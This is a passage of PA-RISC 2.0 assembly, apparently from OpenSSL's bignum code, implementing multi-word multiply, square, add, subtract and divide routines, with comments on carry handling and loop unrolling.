LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m[0] < m1[0])
ADD,L ht_0,top_overflow,ht_0 ; ht[0] += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m[1] < m1[1])
ADD,L ht_1,top_overflow,ht_1 ; ht[1] += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m[0]>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1[0] = m[0]<<32
EXTRD,U tmp_1,31,32,m_1 ; m[1]>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1[1] = m[1]<<32
ADD,L ht_0,m_0,ht_0 ; ht[0]+= (m[0]>>32)
ADD,L ht_1,m_1,ht_1 ; ht[1]+= (m[1]>>32)
ADD lt_0,m1_0,lt_0 ; lt[0] = lt[0]+m1[0];
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_1,m1_1,lt_1 ; lt[1] = lt[1]+m1[1];
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
ADD %ret1,lt_0,lt_0 ; lt[0] = lt[0] + c;
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_0,rp_val,lt_0 ; lt[0] = lt[0]+rp[0]
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
LDO -2(num),num ; num = num - 2;
ADD ht_0,lt_1,lt_1 ; lt[1] = lt[1] + ht_0 (c);
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
ADD lt_1,rp_val_1,lt_1 ; lt[1] = lt[1]+rp[1]
ADD,DC ht_1,%r0,%ret1 ; ht[1]++ (carry out into ret1)
LDO 16(a_ptr),a_ptr ; a_ptr += 2
STD lt_1,8(r_ptr) ; rp[1] = lt[1]
CMPIB,<= 2,num,bn_mul_add_words_unroll2 ; go again if more to do
LDO 16(r_ptr),r_ptr ; r_ptr += 2 (in branch delay slot)
CMPIB,=,N 0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_add_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDO 8(a_ptr),a_ptr ; a_ptr++
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0 ; m1 = temp1
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,tmp_0 ; tmp_0 = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret1,tmp_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_0,rp_val,lt_0 ; lt = lt+rp[0]
ADD,DC ht_0,%r0,%ret1 ; ht++ (carry out into ret1)
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_add_words_exit
.EXIT
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
LDD -80(%sp),%r9 ; restore r9
LDD -88(%sp),%r8 ; restore r8
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
;
; arg0 = rp
; arg1 = ap
; arg3 = num
; w on stack at -56(sp)
;
; BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
; rp[i] = ap[i] * w for i in [0, num); returns the final carry split
; across ret0/ret1.  Same structure as bn_mul_add_words but without the
; read-modify-write of rp[].  Unrolled x2; delay-slot and carry-chain
; order is significant, so the code is annotated only.
;
bn_mul_words
.proc
.callinfo frame=128
.entry
.EXPORT bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
COPY %r0,%ret1 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
CMPIB,>= 0,num,bn_mul_words_exit
LDO 128(%sp),%sp ; bump stack
;
; See if only 1 word to do, thus just do cleanup
;
CMPIB,= 1,num,bn_mul_words_single_top
FLDD -184(%sp),fw ; (-56-128) load up w into fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
FSTD fm1_1,-48(%sp) ; -48(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
XMPYU flt_1,fw_h,fm_1 ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
FSTD fm_1,-40(%sp) ; -40(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt
LDD -8(%sp),m_0
LDD -40(%sp),m_1
LDD -16(%sp),m1_0
LDD -48(%sp),m1_1
LDD -24(%sp),ht_0
LDD -56(%sp),ht_1
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m + m1;
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m + m1;
LDD -32(%sp),lt_0
LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m < m1)
ADD,L ht_1,top_overflow,ht_1 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
EXTRD,U tmp_1,31,32,m_1 ; m>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD,L ht_1,m_1,ht_1 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_1,m1_1,lt_1 ; lt = lt+m1;
ADD,DC ht_1,%r0,ht_1 ; ht++
ADD %ret1,lt_0,lt_0 ; lt = lt + c (ret1);
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD ht_0,lt_1,lt_1 ; lt = lt + c (ht_0)
ADD,DC ht_1,%r0,ht_1 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD lt_1,8(r_ptr) ; rp[1] = lt
COPY ht_1,%ret1 ; carry = ht
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_mul_words_unroll2
LDO 16(r_ptr),r_ptr ; rp++ (in branch delay slot)
CMPIB,=,N 0,num,bn_mul_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt= lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret1,lt_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
COPY ht_0,%ret1 ; copy carry
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_words_exit
.EXIT
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND
;----------------------------------------------------------------------------
;
;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
;
; arg0 = rp
; arg1 = ap
; arg2 = num
;
;
; void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
; For each input word a: rp[2i] = low 64 bits, rp[2i+1] = high 64 bits
; of a*a.  The cross product m = ht*lt contributes twice (hence the
; shift by 32+1 and the masked high part).  Unrolled x2.
;
bn_sqr_words
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP
STD %r5,16(%sp) ; save r5
CMPIB,>= 0,num,bn_sqr_words_exit
LDO 128(%sp),%sp ; bump stack
;
; If only 1, the goto straight to cleanup
;
CMPIB,= 1,num,bn_sqr_words_single_top
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sqr_words_unroll2
FLDD 0(a_ptr),t_float_0 ; a[0]
FLDD 8(a_ptr),t_float_1 ; a[1]
XMPYU fht_0,flt_0,fm ; m[0]
XMPYU fht_1,flt_1,fm_1 ; m[1]
FSTD fm,-24(%sp) ; store m[0]
FSTD fm_1,-56(%sp) ; store m[1]
XMPYU flt_0,flt_0,lt_temp ; lt[0]
XMPYU flt_1,flt_1,lt_temp_1 ; lt[1]
FSTD lt_temp,-16(%sp) ; store lt[0]
FSTD lt_temp_1,-48(%sp) ; store lt[1]
XMPYU fht_0,fht_0,ht_temp ; ht[0]
XMPYU fht_1,fht_1,ht_temp_1 ; ht[1]
FSTD ht_temp,-8(%sp) ; store ht[0]
FSTD ht_temp_1,-40(%sp) ; store ht[1]
LDD -24(%sp),m_0
LDD -56(%sp),m_1
AND m_0,high_mask,tmp_0 ; m[0] & Mask
AND m_1,high_mask,tmp_1 ; m[1] & Mask
DEPD,Z m_0,30,31,m_0 ; m[0] << 32+1
DEPD,Z m_1,30,31,m_1 ; m[1] << 32+1
LDD -16(%sp),lt_0
LDD -48(%sp),lt_1
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m[0]&Mask >> 32-1
EXTRD,U tmp_1,32,33,tmp_1 ; tmp_1 = m[1]&Mask >> 32-1
LDD -8(%sp),ht_0
LDD -40(%sp),ht_1
ADD,L ht_0,tmp_0,ht_0 ; ht[0] += tmp_0
ADD,L ht_1,tmp_1,ht_1 ; ht[1] += tmp_1
ADD lt_0,m_0,lt_0 ; lt = lt+m
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
STD ht_0,8(r_ptr) ; rp[1] = ht[0]
ADD lt_1,m_1,lt_1 ; lt = lt+m
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_1,16(r_ptr) ; rp[2] = lt[1]
STD ht_1,24(r_ptr) ; rp[3] = ht[1]
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_sqr_words_unroll2
LDO 32(r_ptr),r_ptr ; rp += 4 (in branch delay slot)
CMPIB,=,N 0,num,bn_sqr_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_sqr_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,flt_0,fm ; m
FSTD fm,-24(%sp) ; store m
XMPYU flt_0,flt_0,lt_temp ; lt
FSTD lt_temp,-16(%sp) ; store lt
XMPYU fht_0,fht_0,ht_temp ; ht
FSTD ht_temp,-8(%sp) ; store ht
LDD -24(%sp),m_0 ; load m
AND m_0,high_mask,tmp_0 ; m & Mask
DEPD,Z m_0,30,31,m_0 ; m << 32+1
LDD -16(%sp),lt_0 ; lt
LDD -8(%sp),ht_0 ; ht
EXTRD,U tmp_0,32,33,tmp_0 ; tmp_0 = m&Mask >> 32-1
ADD m_0,lt_0,lt_0 ; lt = lt+m
ADD,L ht_0,tmp_0,ht_0 ; ht += tmp_0
ADD,DC ht_0,%r0,ht_0 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD ht_0,8(r_ptr) ; rp[1] = ht
bn_sqr_words_exit
.EXIT
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t .reg %r22
b .reg %r21
l .reg %r20
;
; BN_ULONG bn_add_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
; r[i] = a[i] + b[i] + carry; returns final carry (0 or 1) in ret0/ret1.
; Leaf routine, no frame.  ADD,DC folds the hardware carry bit into the
; running carry register, so statement order below must not change.
;
bn_add_words
.proc
.entry
.callinfo
.EXPORT bn_add_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
CMPIB,>= 0,n,bn_add_words_exit
COPY %r0,%ret1 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_add_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_add_words_unroll2
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry
ADD t,b,l ; l = t + b[0]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,0(r_ptr)
LDD 8(a_ptr),t
LDD 8(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry
ADD t,b,l ; l = t + b[1]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_add_words_unroll2
LDO 16(r_ptr),r_ptr ; (in branch delay slot)
CMPIB,=,N 0,n,bn_add_words_exit ; are we done?
bn_add_words_single_top
LDD 0(a_ptr),t
LDD 0(b_ptr),b
ADD t,%ret1,t ; t = t+c;
ADD,DC %r0,%r0,%ret1 ; set c to carry (could use CMPCLR??)
ADD t,b,l ; l = t + b[0]
ADD,DC %ret1,%r0,%ret1 ; c+= carry
STD l,0(r_ptr)
bn_add_words_exit
.EXIT
BVE (%rp)
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
;
; arg0 = rp
; arg1 = ap
; arg2 = bp
; arg3 = n
t1 .reg %r22
t2 .reg %r21
sub_tmp1 .reg %r20
sub_tmp2 .reg %r19
;
; BN_ULONG bn_sub_words(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b, int n)
; r[i] = a[i] - b[i] - borrow; returns final borrow (0 or 1) in ret0/ret1.
; Borrow is computed via CMPCLR nullification: the LDO 1 / COPY pair is
; skipped when t1 > t2 (no borrow) or t1 == t2 (borrow unchanged).
; Leaf routine, no frame; instruction order is significant.
;
bn_sub_words
.proc
.callinfo
.EXPORT bn_sub_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
CMPIB,>= 0,n,bn_sub_words_exit
COPY %r0,%ret1 ; return 0 by default
;
; If 2 or more numbers do the loop
;
CMPIB,= 1,n,bn_sub_words_single_top
NOP
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
bn_sub_words_unroll2
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0 ; if t1 == t2, keep previous borrow
COPY sub_tmp2,%ret1
STD sub_tmp1,0(r_ptr)
LDD 8(a_ptr),t1
LDD 8(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0 ; if t1 == t2, keep previous borrow
COPY sub_tmp2,%ret1
STD sub_tmp1,8(r_ptr)
LDO -2(n),n
LDO 16(a_ptr),a_ptr
LDO 16(b_ptr),b_ptr
CMPIB,<= 2,n,bn_sub_words_unroll2
LDO 16(r_ptr),r_ptr ; (in branch delay slot)
CMPIB,=,N 0,n,bn_sub_words_exit ; are we done?
bn_sub_words_single_top
LDD 0(a_ptr),t1
LDD 0(b_ptr),t2
SUB t1,t2,sub_tmp1 ; t3 = t1-t2;
SUB sub_tmp1,%ret1,sub_tmp1 ; t3 = t3- c;
CMPCLR,*>> t1,t2,sub_tmp2 ; clear if t1 > t2
LDO 1(%r0),sub_tmp2
CMPCLR,*= t1,t2,%r0 ; if t1 == t2, keep previous borrow
COPY sub_tmp2,%ret1
STD sub_tmp1,0(r_ptr)
bn_sub_words_exit
.EXIT
BVE (%rp)
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
.PROCEND ;in=23,24,25,26,29;out=28;
;------------------------------------------------------------------------------
;
; unsigned long bn_div_words(unsigned long h, unsigned long l, unsigned long d)
;
; arg0 = h
; arg1 = l
; arg2 = d
;
; This is mainly just output from the HP C compiler.
;
;------------------------------------------------------------------------------
;
; bn_div_words(h, l, d): divides the 128-bit value h:l by d (see the C
; prototype comment above).  The body below is HP C compiler output
; (numeric labels, scheduled code, raw ;offset annotations); 64-bit
; quantities are assembled from 32-bit argument registers with DEPD.
; Calls BN_num_bits_word and the $$div2U millicode routine; aborts on
; overflow (the fprintf diagnostic is disabled for PIC builds).
; NOTE(review): left byte-identical — control flow and delay-slot use are
; too order-dependent to restructure safely by hand.
;
bn_div_words
.PROC
.EXPORT bn_div_words,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR,RTNVAL=GR,LONG_RETURN
.IMPORT BN_num_bits_word,CODE
;--- not PIC .IMPORT __iob,DATA
;--- not PIC .IMPORT fprintf,CODE
.IMPORT abort,CODE
.IMPORT $$div2U,MILLICODE
.CALLINFO CALLER,FRAME=144,ENTRY_GR=%r9,SAVE_RP,ARGS_SAVED,ORDERING_AWARE
.ENTRY
STW %r2,-20(%r30) ;offset 0x8ec
STW,MA %r3,192(%r30) ;offset 0x8f0
STW %r4,-188(%r30) ;offset 0x8f4
DEPD %r5,31,32,%r6 ;offset 0x8f8
STD %r6,-184(%r30) ;offset 0x8fc
DEPD %r7,31,32,%r8 ;offset 0x900
STD %r8,-176(%r30) ;offset 0x904
STW %r9,-168(%r30) ;offset 0x908
LDD -248(%r30),%r3 ;offset 0x90c
COPY %r26,%r4 ;offset 0x910
COPY %r24,%r5 ;offset 0x914
DEPD %r25,31,32,%r4 ;offset 0x918
CMPB,*<> %r3,%r0,$0006000C ;offset 0x91c
DEPD %r23,31,32,%r5 ;offset 0x920
MOVIB,TR -1,%r29,$00060002 ;offset 0x924
EXTRD,U %r29,31,32,%r28 ;offset 0x928
$0006002A
LDO -1(%r29),%r29 ;offset 0x92c
SUB %r23,%r7,%r23 ;offset 0x930
$00060024
SUB %r4,%r31,%r25 ;offset 0x934
AND %r25,%r19,%r26 ;offset 0x938
CMPB,*<>,N %r0,%r26,$00060046 ;offset 0x93c
DEPD,Z %r25,31,32,%r20 ;offset 0x940
OR %r20,%r24,%r21 ;offset 0x944
CMPB,*<<,N %r21,%r23,$0006002A ;offset 0x948
SUB %r31,%r2,%r31 ;offset 0x94c
$00060046
$0006002E
DEPD,Z %r23,31,32,%r25 ;offset 0x950
EXTRD,U %r23,31,32,%r26 ;offset 0x954
AND %r25,%r19,%r24 ;offset 0x958
ADD,L %r31,%r26,%r31 ;offset 0x95c
CMPCLR,*>>= %r5,%r24,%r0 ;offset 0x960
LDO 1(%r31),%r31 ;offset 0x964
$00060032
CMPB,*<<=,N %r31,%r4,$00060036 ;offset 0x968
LDO -1(%r29),%r29 ;offset 0x96c
ADD,L %r4,%r3,%r4 ;offset 0x970
$00060036
ADDIB,=,N -1,%r8,$D0 ;offset 0x974
SUB %r5,%r24,%r28 ;offset 0x978
$0006003A
SUB %r4,%r31,%r24 ;offset 0x97c
SHRPD %r24,%r28,32,%r4 ;offset 0x980
DEPD,Z %r29,31,32,%r9 ;offset 0x984
DEPD,Z %r28,31,32,%r5 ;offset 0x988
$0006001C
EXTRD,U %r4,31,32,%r31 ;offset 0x98c
CMPB,*<>,N %r31,%r2,$00060020 ;offset 0x990
MOVB,TR %r6,%r29,$D1 ;offset 0x994
STD %r29,-152(%r30) ;offset 0x998
$0006000C
EXTRD,U %r3,31,32,%r25 ;offset 0x99c
COPY %r3,%r26 ;offset 0x9a0
EXTRD,U %r3,31,32,%r9 ;offset 0x9a4
EXTRD,U %r4,31,32,%r8 ;offset 0x9a8
.CALL ARGW0=GR,ARGW1=GR,RTNVAL=GR ;in=25,26;out=28;
B,L BN_num_bits_word,%r2 ;offset 0x9ac
EXTRD,U %r5,31,32,%r7 ;offset 0x9b0
LDI 64,%r20 ;offset 0x9b4
DEPD %r7,31,32,%r5 ;offset 0x9b8
DEPD %r8,31,32,%r4 ;offset 0x9bc
DEPD %r9,31,32,%r3 ;offset 0x9c0
CMPB,= %r28,%r20,$00060012 ;offset 0x9c4
COPY %r28,%r24 ;offset 0x9c8
MTSARCM %r24 ;offset 0x9cc
DEPDI,Z -1,%sar,1,%r19 ;offset 0x9d0
CMPB,*>>,N %r4,%r19,$D2 ;offset 0x9d4
$00060012
SUBI 64,%r24,%r31 ;offset 0x9d8
CMPCLR,*<< %r4,%r3,%r0 ;offset 0x9dc
SUB %r4,%r3,%r4 ;offset 0x9e0
$00060016
CMPB,= %r31,%r0,$0006001A ;offset 0x9e4
COPY %r0,%r9 ;offset 0x9e8
MTSARCM %r31 ;offset 0x9ec
DEPD,Z %r3,%sar,64,%r3 ;offset 0x9f0
SUBI 64,%r31,%r26 ;offset 0x9f4
MTSAR %r26 ;offset 0x9f8
SHRPD %r4,%r5,%sar,%r4 ;offset 0x9fc
MTSARCM %r31 ;offset 0xa00
DEPD,Z %r5,%sar,64,%r5 ;offset 0xa04
$0006001A
DEPDI,Z -1,31,32,%r19 ;offset 0xa08
AND %r3,%r19,%r29 ;offset 0xa0c
EXTRD,U %r29,31,32,%r2 ;offset 0xa10
DEPDI,Z -1,63,32,%r6 ;offset 0xa14
MOVIB,TR 2,%r8,$0006001C ;offset 0xa18
EXTRD,U %r3,63,32,%r7 ;offset 0xa1c
$D2
;--- not PIC ADDIL LR'__iob-$global$,%r27,%r1 ;offset 0xa20
;--- not PIC LDIL LR'C$7,%r21 ;offset 0xa24
;--- not PIC LDO RR'__iob-$global$+32(%r1),%r26 ;offset 0xa28
;--- not PIC .CALL ARGW0=GR,ARGW1=GR,ARGW2=GR,RTNVAL=GR ;in=24,25,26;out=28;
;--- not PIC B,L fprintf,%r2 ;offset 0xa2c
;--- not PIC LDO RR'C$7(%r21),%r25 ;offset 0xa30
.CALL ;
B,L abort,%r2 ;offset 0xa34
NOP ;offset 0xa38
B $D3 ;offset 0xa3c
LDW -212(%r30),%r2 ;offset 0xa40
$00060020
COPY %r4,%r26 ;offset 0xa44
EXTRD,U %r4,31,32,%r25 ;offset 0xa48
COPY %r2,%r24 ;offset 0xa4c
.CALL ;in=23,24,25,26;out=20,21,22,28,29; (MILLICALL)
B,L $$div2U,%r31 ;offset 0xa50
EXTRD,U %r2,31,32,%r23 ;offset 0xa54
DEPD %r28,31,32,%r29 ;offset 0xa58
$00060022
STD %r29,-152(%r30) ;offset 0xa5c
$D1
AND %r5,%r19,%r24 ;offset 0xa60
EXTRD,U %r24,31,32,%r24 ;offset 0xa64
STW %r2,-160(%r30) ;offset 0xa68
STW %r7,-128(%r30) ;offset 0xa6c
FLDD -152(%r30),%fr4 ;offset 0xa70
FLDD -152(%r30),%fr7 ;offset 0xa74
FLDW -160(%r30),%fr8L ;offset 0xa78
FLDW -128(%r30),%fr5L ;offset 0xa7c
XMPYU %fr8L,%fr7L,%fr10 ;offset 0xa80
FSTD %fr10,-136(%r30) ;offset 0xa84
XMPYU %fr8L,%fr7R,%fr22 ;offset 0xa88
FSTD %fr22,-144(%r30) ;offset 0xa8c
XMPYU %fr5L,%fr4L,%fr11 ;offset 0xa90
XMPYU %fr5L,%fr4R,%fr23 ;offset 0xa94
FSTD %fr11,-112(%r30) ;offset 0xa98
FSTD %fr23,-120(%r30) ;offset 0xa9c
LDD -136(%r30),%r28 ;offset 0xaa0
DEPD,Z %r28,31,32,%r31 ;offset 0xaa4
LDD -144(%r30),%r20 ;offset 0xaa8
ADD,L %r20,%r31,%r31 ;offset 0xaac
LDD -112(%r30),%r22 ;offset 0xab0
DEPD,Z %r22,31,32,%r22 ;offset 0xab4
LDD -120(%r30),%r21 ;offset 0xab8
B $00060024 ;offset 0xabc
ADD,L %r21,%r22,%r23 ;offset 0xac0
$D0
OR %r9,%r29,%r29 ;offset 0xac4
$00060040
EXTRD,U %r29,31,32,%r28 ;offset 0xac8
$00060002
$L2
LDW -212(%r30),%r2 ;offset 0xacc
$D3
LDW -168(%r30),%r9 ;offset 0xad0
LDD -176(%r30),%r8 ;offset 0xad4
EXTRD,U %r8,31,32,%r7 ;offset 0xad8
LDD -184(%r30),%r6 ;offset 0xadc
EXTRD,U %r6,31,32,%r5 ;offset 0xae0
LDW -188(%r30),%r4 ;offset 0xae4
BVE (%r2) ;offset 0xae8
.EXIT
LDW,MB -192(%r30),%r3 ;offset 0xaec
.PROCEND ;in=23,25;out=28,29;fpin=105,107;
;----------------------------------------------------------------------------
;
; Registers to hold 64-bit values to manipulate. The "L" part
; of the register corresponds to the upper 32-bits, while the "R"
; part corresponds to the lower 32-bits
;
; Note, that when using b6 and b7, the code must save these before
; using them because they are callee save registers
;
;
; Floating point registers to use to save values that
; are manipulated. These don't collide with ftemp1-6 and
; are all caller save registers
;
a0 .reg %fr22
a0L .reg %fr22L
a0R .reg %fr22R
a1 .reg %fr23
a1L .reg %fr23L
a1R .reg %fr23R
a2 .reg %fr24
a2L .reg %fr24L
a2R .reg %fr24R
a3 .reg %fr25
a3L .reg %fr25L
a3R .reg %fr25R
a4 .reg %fr26
a4L .reg %fr26L
a4R .reg %fr26R
a5 .reg %fr27
a5L .reg %fr27L
a5R .reg %fr27R
a6 .reg %fr28
a6L .reg %fr28L
a6R .reg %fr28R
a7 .reg %fr29
a7L .reg %fr29L
a7R .reg %fr29R
b0 .reg %fr30
b0L .reg %fr30L
b0R .reg %fr30R
b1 .reg %fr31
